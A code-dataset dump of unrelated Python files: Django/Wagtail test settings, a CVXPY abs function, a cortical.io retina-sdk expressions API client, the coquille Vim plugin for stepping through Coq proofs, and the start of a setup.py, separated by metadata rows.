COMPRESS_ENABLED = False
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
USE_TZ = True
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'wagtail.wagtailcore.middleware.SiteMiddleware',
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'wagtail.tests.context_processors.do_not_use_static_url',
],
},
},
]
INSTALLED_APPS = (
'tests',
'wagtail.wagtailsites',
'wagtail.wagtailusers',
'wagtail.wagtailadmin',
'wagtail.wagtailcore',
'wagtail.wagtailimages',
'wagtail.wagtaildocs',
'wagtail.wagtailsearch',
'taggit',
'compressor',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
# Using DatabaseCache to make sure that the cache is cleared between tests.
# This prevents false-positives in some wagtail core tests where we are
# changing the 'wagtail_root_paths' key which may cause future tests to fail.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'cache',
}
}
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher', # don't use the intentionally slow default password hasher
)
WAGTAIL_SITE_NAME = "Test Site"
|
bsd-2-clause
| 2,868,741,275,238,496,000
| 26.152174
| 112
| 0.665733
| false
| 3.927673
| true
| true
| false
|
sergiocallegari/PyDSM
|
cvxpy_tinoco/functions/abs.py
|
1
|
2839
|
#***********************************************************************#
# Copyright (C) 2010-2012 Tomas Tinoco De Rubira #
# #
# This file is part of CVXPY #
# #
# CVXPY is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# CVXPY is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
#***********************************************************************#
import numpy as np
from ..defs import *
from ..utils import *
from ..interface import *
from ..arrays import cvxpy_array
from ..arrays import cvxpy_matrix
# abs
def abs(x):
"""
| :math:`\mbox{abs} :
\mathbb{R}^{m \\times n} \\to \mathbb{R}^{m \\times n},
\ \mbox{abs}(X)_{ij} = |X_{ij}|`.
| Convex.
:param x: number,
:ref:`scalar object<scalar_ref>` or
:ref:`multidimensional object<multi_ref>`.
:return: number,
:ref:`tree<tree_obj>`,
:ref:`matrix<matrix_obj>` or
:ref:`array<array_obj>`.
"""
# Prepare input
if (np.isscalar(x) or
type(x).__name__ in SCALAR_OBJS):
arg = vstack([x])
elif (type(x) is cvxpy_matrix or
type(x).__name__ in ARRAY_OBJS):
arg = x
else:
raise TypeError('Invalid argument')
# Prepare output
if type(arg) is cvxpy_matrix:
output = zeros(arg.shape)
else:
output = cvxpy_array(arg.shape[0],arg.shape[1])
# Construct program
for i in range(0,arg.shape[0],1):
for j in range(0,arg.shape[1],1):
t = variable()
v = variable()
p = program(minimize(t),
[less_equals(v,t),less_equals(-t,v)],
[v],
name='abs')
output[i,j] = p(arg[i,j])
# Return output
if output.shape == (1,1):
return output[0,0]
else:
return output
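# Small usage sketch (assumes the package's variable/program machinery used
# above): abs() on a scalar object returns a single scalar tree.
#
#     x = variable()
#     t = abs(x)  # tree encoding |x|, usable inside larger programs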
|
gpl-3.0
| -5,290,735,920,992,748,000
| 36.853333
| 78
| 0.450863
| false
| 4.144526
| false
| false
| false
|
cortical-io/retina-sdk.py
|
retinasdk/client/expressions_api.py
|
1
|
8726
|
"""
/*******************************************************************************
* Copyright (c) cortical.io GmbH. All rights reserved.
*
* This software is confidential and proprietary information.
* You shall use it only in accordance with the terms of the
* license agreement you entered into with cortical.io GmbH.
******************************************************************************/
"""
from retinasdk.model import context
from retinasdk.model import fingerprint
from retinasdk.model import term
class ExpressionsApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def resolveExpression(self, retina_name, body, sparsity=1.0):
"""Resolve an expression
Args:
retina_name, str: The retina name (required)
            body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Fingerprint
"""
resourcePath = '/expressions'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['sparsity'] = sparsity
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return fingerprint.Fingerprint(**response.json())
def getContextsForExpression(self, retina_name, body, get_fingerprint=None, start_index=0, max_results=5, sparsity=1.0):
"""Get semantic contexts for the input expression
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
            start_index, int: The start-index for pagination (optional)
            max_results, int: Max results per page (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Context]
"""
resourcePath = '/expressions/contexts'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [context.Context(**r) for r in response.json()]
def getSimilarTermsForExpressionContext(self, retina_name, body, context_id=None, pos_type=None, get_fingerprint=None, start_index=0, max_results=10, sparsity=1.0):
"""Get similar terms for the contexts of an expression
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
            context_id, int: The identifier of a context (optional)
            pos_type, str: Part of speech (optional)
            get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
            start_index, int: The start-index for pagination (optional)
            max_results, int: Max results per page (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Term]
"""
resourcePath = '/expressions/similar_terms'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['context_id'] = context_id
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['pos_type'] = pos_type
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [term.Term(**r) for r in response.json()]
def resolveBulkExpression(self, retina_name, body, sparsity=1.0):
"""Bulk resolution of expressions
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Fingerprint]
"""
resourcePath = '/expressions/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['sparsity'] = sparsity
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [fingerprint.Fingerprint(**r) for r in response.json()]
def getContextsForBulkExpression(self, retina_name, body, get_fingerprint=None, start_index=0, max_results=5, sparsity=1.0):
"""Bulk get contexts for input expressions
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
            start_index, int: The start-index for pagination (optional)
            max_results, int: Max results per page (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Context]
"""
resourcePath = '/expressions/contexts/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [[context.Context(**c) for c in r] for r in response.json()]
def getSimilarTermsForBulkExpressionContext(self, retina_name, body, context_id=None, pos_type=None, get_fingerprint=None, start_index=0, max_results=10, sparsity=1.0):
"""Bulk get similar terms for input expressions
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
            context_id, int: The identifier of a context (optional)
            pos_type, str: Part of speech (optional)
            get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
            start_index, int: The start-index for pagination (optional)
            max_results, int: Max results per page (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Term]
"""
resourcePath = '/expressions/similar_terms/bulk'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['context_id'] = context_id
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['pos_type'] = pos_type
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [[term.Term(**t) for t in r] for r in response.json()]
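# Hypothetical usage sketch (retina name and expression are placeholders;
# apiClient comes from the package's client wiring):
#
#     api = ExpressionsApi(apiClient)
#     fp = api.resolveExpression('en_associative', '{"term": "apple"}')
#     print(fp.positions[:10])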
|
bsd-2-clause
| -2,128,285,797,401,714,700
| 43.520408
| 172
| 0.637062
| false
| 4.298522
| false
| false
| false
|
bluelightning32/coquille
|
autoload/coquille.py
|
1
|
27276
|
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import vim
import re
import xml.etree.ElementTree as ET
import coqtop as CT
import project_file
from collections import deque
import vimbufsync
vimbufsync.check_version([0,1,0], who="coquille")
# Define unicode and long in python 3
if isinstance(__builtins__, dict):
    unicode = __builtins__.get('unicode', str)
    long = __builtins__.get('long', int)
else:
    unicode = getattr(__builtins__, 'unicode', str)
    long = getattr(__builtins__, 'long', int)
# Cache whether vim has a bool type; vim.eval() returns the string "0" or "1",
# and any non-empty string is truthy, so compare explicitly.
vim_has_bool = vim.eval("exists('v:false')") == "1"
def vim_repr(value):
"Converts a python value into a vim value"
if isinstance(value, bool):
if value:
if vim_has_bool:
return "v:true"
else:
return "1"
else:
if vim_has_bool:
return "v:false"
else:
return "0"
if isinstance(value, int) or isinstance(value, long):
return str(value)
if isinstance(value, bytes):
value = value.decode("utf-8")
if isinstance(value, unicode):
return value.replace("'", "''")
return "unknown"
# Convert 0-based (line, col, byte) tuples into 1-based lists in the form
# [line, byte]
def make_vim_range(start, stop):
return [[start[0] + 1, start[2] + 1], [stop[0] + 1, stop[2] + 1]]
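# e.g. make_vim_range((0, 0, 0), (2, 3, 5)) == [[1, 1], [3, 6]]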
# Return a list of all windows that are displaying the buffer, along with their
# current cursor positions.
def get_cursors_for_buffer(vim_buffer):
result = []
for win in vim.windows:
if win.buffer is vim_buffer:
result.append((win, win.cursor))
return result
# Takes the list of window cursor positions from get_cursors_for_buffer. If the
# cursor position is now lower for any of the windows, they are entered to
# rescroll the window.
def fix_scroll(cursors):
refresh_now = None
for win, (row, col) in cursors:
if win.cursor[0] < row or win.cursor[1] < col:
win.vars['coquille_needs_scroll_fix'] = 1
if win.tabpage is vim.current.tabpage:
vim.command("call coquille#FixWindowScrollTabWin(%d, %d)" %
(win.tabpage.number, win.number))
# All the python side state associated with the vim source buffer
class BufferState(object):
# Dict mapping source buffer id to BufferState
source_mapping = {}
@classmethod
def lookup_bufid(cls, bufid):
# For convenience, the vim script passes vim.eval("l:bufid") to this
# function, and vim.eval() returns a string.
bufid = int(bufid)
if bufid in cls.source_mapping:
state = cls.source_mapping[bufid]
else:
state = BufferState(vim.buffers[bufid])
cls.source_mapping[bufid] = state
if state.sync_vars():
return state
else:
del cls.source_mapping[bufid]
return None
def __init__(self, source_buffer):
self.source_buffer = source_buffer
self.info_buffer = None
self.goal_buffer = None
#: See vimbufsync ( https://github.com/def-lkb/vimbufsync )
self.saved_sync = None
self.coq_top = CT.CoqTop()
def sync_vars(self):
"Updates python member variables based on the vim variables"
if not self.source_buffer.valid:
return False
if self.source_buffer.options["filetype"] != b"coq":
return False
goal_bufid = self.source_buffer.vars.get("coquille_goal_bufid", -1)
if goal_bufid != -1:
self.goal_buffer = vim.buffers[goal_bufid]
else:
self.goal_buffer = None
info_bufid = self.source_buffer.vars.get("coquille_info_bufid", -1)
if info_bufid != -1:
self.info_buffer = vim.buffers[info_bufid]
else:
self.info_buffer = None
return True
###################
# synchronization #
###################
def sync(self):
curr_sync = vimbufsync.sync(self.source_buffer)
if not self.saved_sync or curr_sync.buf() != self.saved_sync.buf():
if self.coq_top.get_active_command_count() > 1:
self._reset()
else:
(line, col) = self.saved_sync.pos()
# vim indexes from lines 1, coquille from 0
self.rewind_to(line - 1, col - 1)
self.saved_sync = curr_sync
def _reset(self):
self.coq_top.kill_coqtop()
self.saved_sync = None
self.reset_color()
#####################
# exported commands #
#####################
def kill_coqtop(self):
if self is None:
return
self._reset()
def goto_last_sent_dot(self):
last = self.coq_top.get_last_active_command()
(line, col) = ((0,1) if not last else last.end)
vim.current.window.cursor = (line + 1, col)
def coq_rewind(self, steps=1):
self.clear_info()
# Do not allow the root state to be rewound
if steps < 1 or self.coq_top.get_active_command_count() < 2:
return
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
response = self.coq_top.rewind(steps)
if response is None:
vim.command("call coquille#KillSession()")
print('ERROR: the Coq process died')
return
self.refresh()
# steps != 1 means that either the user called "CoqToCursor" or just started
# editing in the "locked" zone. In both these cases we don't want to move
# the cursor.
if (steps == 1 and vim.eval('g:coquille_auto_move') == 'true'):
self.goto_last_sent_dot()
def coq_to_cursor(self):
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
self.sync()
(cline, ccol) = vim.current.window.cursor
cline -= 1
last = self.coq_top.get_last_active_command()
last_sent = ((0,0,0) if not last else last.end)
(line, col, byte) = last_sent
if cline < line or (cline == line and ccol < col):
# Add 1 to the column to leave whatever is at the
# cursor as sent.
self.rewind_to(cline, ccol + 1)
else:
send_queue = deque([])
while True:
r = self._get_message_range(last_sent)
if (r is not None
and (r[1][0], r[1][1]) <= (cline, ccol + 1)):
last_sent = r[1]
send_queue.append(r)
else:
break
self.send_until_fail(send_queue)
def coq_next(self):
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
self.sync()
last = self.coq_top.get_last_active_command()
last_sent = ((0,0,0) if not last else last.end)
message_range = self._get_message_range(last_sent)
if message_range is None: return
send_queue = deque([])
send_queue.append(message_range)
self.send_until_fail(send_queue)
if (vim.eval('g:coquille_auto_move') == 'true'):
self.goto_last_sent_dot()
def coq_raw_query(self, *args):
self.clear_info()
if self.coq_top.coqtop is None:
print("Error: Coqtop isn't running. Are you sure you called :CoqLaunch?")
return
raw_query = ' '.join(args)
response = self.coq_top.query(raw_query)
if response is None:
vim.command("call coquille#KillSession()")
print('ERROR: the Coq process died')
return
info_msg = self.coq_top.get_messages()
self.show_info(info_msg)
def launch_coq(self, *args):
use_project_args = self.source_buffer.vars.get(
"coquille_append_project_args",
vim.vars.get("coquille_append_project_args", 0))
if use_project_args:
# Vim passes the args as a tuple
args = list(args)
args.extend(project_file.find_and_parse_file(
self.source_buffer.name))
return self.coq_top.restart_coq(*args)
    def debug(self):
        commands = self.coq_top.get_active_commands()
        print("encountered dots = [")
        for c in commands:
            print(" (%d, %d) ; " % (c.end[0], c.end[1]))
        print("]")
#####################################
# IDE tools: Goal, Infos and colors #
#####################################
def refresh(self):
last_info = [None]
def update():
self.reset_color()
vim.command('redraw')
new_info = self.coq_top.get_messages()
if last_info[0] != new_info:
self.show_info(new_info)
last_info[0] = new_info
        # It seems that coqtop needs some kind of call like Status or Goal to
        # trigger it to start processing all the commands that have been added.
        # So show_goal needs to be called before waiting for all the unchecked
        # commands to finish.
response = self.coq_top.goals(update)
if self.show_goal(response):
while self.coq_top.has_unchecked_commands():
self.coq_top.process_response()
update()
update()
def show_goal(self, response):
# Temporarily make the goal buffer modifiable
modifiable = self.goal_buffer.options["modifiable"]
self.goal_buffer.options["modifiable"] = True
try:
cursors = get_cursors_for_buffer(self.goal_buffer)
del self.goal_buffer[:]
if response is None:
return False
goals = response.val
if goals is None:
self.goal_buffer[0] = 'No goals.'
return True
sub_goals = goals.fg
msg_format = '{0} subgoal{1}'
show_hyps = True
if not sub_goals:
show_hyps = False
sub_goals = []
for (before, after) in goals.bg:
sub_goals.extend(reversed(before))
sub_goals.extend(after)
if sub_goals:
msg_format = ('This subproof is complete, but there {2} {0}'
' unfocused goal{1}')
if not sub_goals:
msg_format = 'No more subgoals.'
nb_subgoals = len(sub_goals)
self.goal_buffer[0] = msg_format.format(nb_subgoals,
'' if nb_subgoals == 1 else 's',
'is' if nb_subgoals == 1 else 'are')
self.goal_buffer.append([''])
for idx, sub_goal in enumerate(sub_goals):
_id = sub_goal.id
hyps = sub_goal.hyp
ccl = sub_goal.ccl
if show_hyps:
# we print the environment only for the current subgoal
for hyp in hyps:
lst = map(lambda s: s.encode('utf-8'), hyp.split('\n'))
self.goal_buffer.append(list(lst))
show_hyps = False
self.goal_buffer.append('')
                self.goal_buffer.append('======================== ( %d / %d )' % (idx + 1, nb_subgoals))
lines = map(lambda s: s.encode('utf-8'), ccl.split('\n'))
self.goal_buffer.append(list(lines))
self.goal_buffer.append('')
fix_scroll(cursors)
finally:
self.goal_buffer.options["modifiable"] = modifiable
return True
def show_info(self, message):
# Temporarily make the info buffer modifiable
modifiable = self.info_buffer.options["modifiable"]
self.info_buffer.options["modifiable"] = True
try:
cursors = get_cursors_for_buffer(self.info_buffer)
del self.info_buffer[:]
lst = []
if message is not None:
lst = list(map(lambda s: s.encode('utf-8'),
message.split('\n')))
if len(lst) >= 1:
                # If self.info_buffer were a regular list, the del statement
                # above would have deleted all the lines. However with a vim
                # buffer, that actually leaves 1 blank line. So now for setting
                # the new contents, the very first line has to be overwritten,
                # then the rest can be appended.
                #
                # Also note that if info_buffer were a list, extend would be the
                # appropriate function. However info_buffer does not have an
                # extend function, and its append mostly behaves like extend.
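                # For example (hypothetical buffer contents):
                #   del buf[:]                       # buf is now ['']
                #   buf[0] = 'first'                 # overwrite the blank line
                #   buf.append(['second', 'third'])  # extend-like append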
self.info_buffer[0] = lst[0]
self.info_buffer.append(lst[1:])
fix_scroll(cursors)
finally:
self.info_buffer.options["modifiable"] = modifiable
def clear_info(self):
self.coq_top.clear_messages()
self.show_info(None)
def convert_offset(self, range_start, offset, range_end):
message = self._between(range_start, range_end)
(line, col, byte) = _pos_from_offset(range_start[1], range_start[2],
message, offset)
return (line + range_start[0], col, byte)
def reset_color(self):
sent = []
checked = []
warnings = []
errors = []
prev_end = None
sent_start = None
checked_start = None
commands = self.coq_top.get_commands()
for c in commands:
if c.state in (CT.Command.REVERTED, CT.Command.ABANDONED):
break
if c.state == CT.Command.SENT:
if sent_start is None:
# Start a sent range
sent_start = prev_end
elif sent_start is not None:
# Finish a sent range
sent.append(make_vim_range(sent_start, prev_end))
sent_start = None
# Include all the processed commands as checked, even if they
# produced a warning or error message. A subrange will also be
# marked as a warning or error, but that will override the checked
# group.
if c.state == CT.Command.PROCESSED:
if checked_start is None:
# Start a checked range
checked_start = prev_end
elif checked_start is not None:
# Finish a checked range
checked.append(make_vim_range(checked_start, prev_end))
checked_start = None
prev_end = c.end
if sent_start is not None:
# Finish a sent range
sent.append(make_vim_range(sent_start, prev_end))
if checked_start is not None:
# Finish a checked range
checked.append(make_vim_range(checked_start, prev_end))
prev_end = None
for c in commands:
if c.msg_type != CT.Command.NONE:
# Normalize the start and stop positions, if it hasn't been done yet.
if c.msg_start_offset is not None and c.msg_start is None:
c.msg_start = self.convert_offset(prev_end,
c.msg_start_offset,
c.end)
if c.msg_stop_offset is not None and c.msg_stop is None:
c.msg_stop = self.convert_offset(prev_end,
c.msg_stop_offset,
c.end)
start = c.msg_start
stop = c.msg_stop
if start == stop:
start = prev_end
stop = c.end
if c.msg_type == CT.Command.WARNING:
warnings.append(make_vim_range(start, stop))
else:
errors.append(make_vim_range(start, stop))
prev_end = c.end
self.source_buffer.vars['coquille_sent'] = sent
self.source_buffer.vars['coquille_checked'] = checked
self.source_buffer.vars['coquille_warnings'] = warnings
self.source_buffer.vars['coquille_errors'] = errors
vim.command("call coquille#SyncBufferColors(%d)" %
self.source_buffer.number)
def rewind_to(self, line, col):
""" Go backwards to the specified position
line and col are 0-based and point to the first position to
remove from the sent region.
"""
if self.coq_top.coqtop is None:
            print('Internal error: vimbufsync is still being called but '
                  'coqtop appears to be down.')
            print('Please report.')
return
last = self.coq_top.get_last_active_command()
if (last and (last.end[0], last.end[1]) <= (line, col)):
# The caller asked to rewind to a position after what has been
# processed. This quick path exits without having to search the
# state list.
return
predicate = lambda x: (x.end[0], x.end[1]) <= (line, col)
commands = self.coq_top.get_active_commands()
lst = filter(predicate, commands)
steps = len(commands) - len(list(lst))
if steps != 0:
self.coq_rewind(steps)
#############################
# Communication with Coqtop #
#############################
def send_until_fail(self, send_queue):
"""
Tries to send every message in [send_queue] to Coq, stops at the first
error.
When this function returns, [send_queue] is empty.
"""
self.clear_info()
# Start sending on a background thread
self.coq_top.send_async(send_queue)
# Redraw the screen when the background thread makes progress
while True:
result = self.coq_top.wait_for_result()
if result & CT.CoqTop.COMMAND_CHANGED:
self.reset_color()
vim.command('redraw')
if result & CT.CoqTop.MESSAGE_RECEIVED:
new_info = self.coq_top.get_messages()
self.show_info(new_info)
if result & CT.CoqTop.SEND_DONE:
break
self.coq_top.finish_send()
self.refresh()
#################
# Miscellaneous #
#################
# col_offset is a character offset, not byte offset
def _get_remaining_line(self, line, col_offset):
s = self.source_buffer[line]
if not isinstance(s, unicode):
s = s.decode("utf-8")
return s[col_offset:]
def _between(self, begin, end):
"""
Returns a string corresponding to the portion of the buffer between the
[begin] and [end] positions.
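        Positions are (line, col, byte) triples and both endpoints are
        inclusive: e.g. between (0, 2, 2) and (0, 4, 4) of a buffer line
        "abcdef" this returns "cde\n".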
"""
(bline, bcol, bbyte) = begin
(eline, ecol, ebyte) = end
acc = ""
        for line, s in enumerate(self.source_buffer[bline:eline + 1]):
            if not isinstance(s, unicode):
                s = s.decode("utf-8")
            start = bcol if line == 0 else 0
            stop = ecol + 1 if line == eline - bline else len(s)
            acc += s[start:stop] + '\n'
return acc
# Convert a pos from (line, col) to (line, col, byte_offset)
#
# The byte_offset is relative to the start of the line. It is the same as
# col, unless there are non-ascii characters.
#
# line, col, and byte_offset are all 0-indexed.
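    #
    # For example, in the line u"héllo" the position (0, 2) becomes
    # (0, 2, 3), because 'é' occupies two bytes in UTF-8.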
def _add_byte_offset(self, pos):
(line, col) = pos
s = self.source_buffer[line]
if not isinstance(s, unicode):
s = s.decode("utf-8")
return (line, col, len(s[:col].encode("utf-8")))
def _get_message_range(self, after):
""" See [_find_next_chunk] """
(line, col, byte) = after
end_pos = self._find_next_chunk(line, col)
if end_pos is None:
return None
else:
end_pos = self._add_byte_offset(end_pos)
(eline, ecol, ebyte) = end_pos
message = self._between(after,
(eline, ecol - 1, ebyte - 1))
return (message, end_pos)
# A bullet is:
# - One or more '-'
# - One or more '+'
# - One or more '*'
# - Exactly 1 '{' (additional ones are parsed as separate statements)
# - Exactly 1 '}' (additional ones are parsed as separate statements)
bullets = re.compile("-+|\++|\*+|{|}")
def _find_next_chunk(self, line, col):
"""
Returns the position of the next chunk dot after a certain position.
That can either be a bullet if we are in a proof, or "a string" terminated
by a dot (outside of a comment, and not denoting a path).
"""
blen = len(self.source_buffer)
        # We start by stripping all whitespace (including \n) from the
        # beginning of the chunk.
while line < blen:
line_val = self.source_buffer[line]
if not isinstance(line_val, unicode):
line_val = line_val.decode("utf-8")
while col < len(line_val) and line_val[col] in (' ', '\t'):
col += 1
if col < len(line_val) and line_val[col] not in (' ', '\t'):
break
line += 1
col = 0
if line >= blen: return
# Then we check if the first character of the chunk is a bullet.
        # Initially I did that only when I was sure to be in a proof (by looking in
# [encountered_dots] whether I was after a "collapsable" chunk or not), but
# 1/ that didn't play well with coq_to_cursor (as the "collapsable chunk"
# might not have been sent/detected yet).
# 2/ The bullet chars can never be used at the *beginning* of a chunk
        # outside of a proof. So the check was unnecessary.
bullet_match = self.bullets.match(line_val, col)
if bullet_match:
return (line, bullet_match.end())
        # We might have a comment before the bullet; we should skip it and keep
        # on looking.
tail_len = len(line_val) - col
if ((tail_len - 1 > 0) and line_val[col] == '('
and line_val[col + 1] == '*'):
com_end = self._skip_comment(line, col + 2, 1)
if not com_end: return
(line, col) = com_end
return self._find_next_chunk(line, col)
# If the chunk doesn't start with a bullet, we look for a dot.
dot = self._find_dot_after(line, col)
if dot:
# Return the position one after the dot
return (dot[0], dot[1] + 1)
else:
return None
def _find_dot_after(self, line, col):
"""
Returns the position of the next "valid" dot after a certain position.
Valid here means: recognized by Coq as terminating an input, so dots in
comments, strings or ident paths are not valid.
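        For example, in "Require Import Coq.Arith. (* note *)" only the dot
        followed by a space (the one after "Arith") terminates the input;
        the dot inside the path "Coq.Arith" is skipped.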
"""
if line >= len(self.source_buffer): return
s = self._get_remaining_line(line, col)
dot_pos = s.find('.')
com_pos = s.find('(*')
str_pos = s.find('"')
if com_pos == -1 and dot_pos == -1 and str_pos == -1:
# Nothing on this line
return self._find_dot_after(line + 1, 0)
        elif dot_pos == -1 or (com_pos > -1 and dot_pos > com_pos) or (str_pos > -1 and dot_pos > str_pos):
if str_pos == -1 or (com_pos > -1 and str_pos > com_pos):
# We see a comment opening before the next dot
com_end = self._skip_comment(line, com_pos + 2 + col, 1)
if not com_end: return
(line, col) = com_end
return self._find_dot_after(line, col)
else:
# We see a string starting before the next dot
str_end = self._skip_str(line, str_pos + col + 1)
if not str_end: return
(line, col) = str_end
return self._find_dot_after(line, col)
elif dot_pos < len(s) - 1 and s[dot_pos + 1] != ' ':
            # Sometimes dots are used to access module fields; we don't want to
            # stop just after the module name.
# Example: [Require Import Coq.Arith]
return self._find_dot_after(line, col + dot_pos + 1)
elif dot_pos + col > 0 and self._get_remaining_line(line, col + dot_pos - 1)[0] == '.':
# FIXME? There might be a cleaner way to express this.
# We don't want to capture ".."
if dot_pos + col > 1 and self._get_remaining_line(line, col + dot_pos - 2)[0] == '.':
# But we want to capture "..."
return (line, dot_pos + col)
else:
return self._find_dot_after(line, col + dot_pos + 1)
else:
return (line, dot_pos + col)
# TODO? factorize [_skip_str] and [_skip_comment]
def _skip_str(self, line, col):
"""
        Used when we encounter the start of a string before a valid dot (see
        [_find_dot_after]).
Returns the position of the end of the string.
"""
while True:
if line >= len(self.source_buffer): return
s = self._get_remaining_line(line, col)
str_end = s.find('"')
if str_end > -1:
return (line, col + str_end + 1)
line += 1
col = 0
def _skip_comment(self, line, col, nb_left):
"""
        Used when we encounter the start of a comment before a valid dot (see
        [_find_dot_after]).
Returns the position of the end of the comment.
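        Coq comments nest, so [nb_left] counts the number of currently
        unclosed '(*' openers: e.g. "(* outer (* inner *) still outer *)"
        is skipped as a single comment.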
"""
while nb_left > 0:
if line >= len(self.source_buffer): return None
s = self._get_remaining_line(line, col)
com_start = s.find('(*')
com_end = s.find('*)')
if com_end > -1 and (com_end < com_start or com_start == -1):
col += com_end + 2
nb_left -= 1
elif com_start > -1:
col += com_start + 2
nb_left += 1
else:
line += 1
col = 0
return (line, col)
def _empty_range():
return [ { 'line': 0, 'col': 0}, { 'line': 0, 'col': 0} ]
# Converts a byte offset into a message into a (line, col, byte) tuple
#
# msg is a unicode string the offset is relative to. col is the column where
# msg starts, and byte is the byte offset where it starts.
#
# All indices are 0-based.
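#
# For example, _pos_from_offset(4, 4, u"ab\ncd", 4) returns (1, 1, 1): the
# offset lands one character into the second line of msg, so the starting
# col and byte no longer apply.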
def _pos_from_offset(col, byte, msg, offset):
str = msg.encode("utf-8")[:offset].decode("utf-8")
lst = str.split('\n')
line = len(lst) - 1
col = len(lst[-1]) + (col if line == 0 else 0)
byte = len(lst[-1].encode("utf-8")) + (byte if line == 0 else 0)
return (line, col, byte)
|
isc
| -3,639,177,339,411,047,000
| 36.778393
| 109
| 0.530356
| false
| 3.887685
| false
| false
| false
|
blink1073/image_inspector
|
setup.py
|
1
|
1488
|
"""Setup script for image_inspector package.
"""
DISTNAME = 'iminspector'
DESCRIPTION = 'Image Interaction widgets and viewer.'
LONG_DESCRIPTION = open('README.rst', 'rb').read().decode('utf-8')
MAINTAINER = 'Steven Silvester'
MAINTAINER_EMAIL = 'steven.silvester@ieee.org'
URL = 'http://github.com/blink1073/image_inspector'
LICENSE = 'MIT'
REQUIRES = ["numpy (>= 1.7.1)", "matplotlib (>= 1.4)"]
CLASSIFIERS = """\
Intended Audience :: Developers
Intended Audience :: Science/Research
License :: OSI Approved :: MIT License
Operating System :: OS Independent
Programming Language :: Python
Programming Language :: Python :: 2.7
Programming Language :: Python :: 3.3
Programming Language :: Python :: 3.4
Topic :: Scientific/Engineering
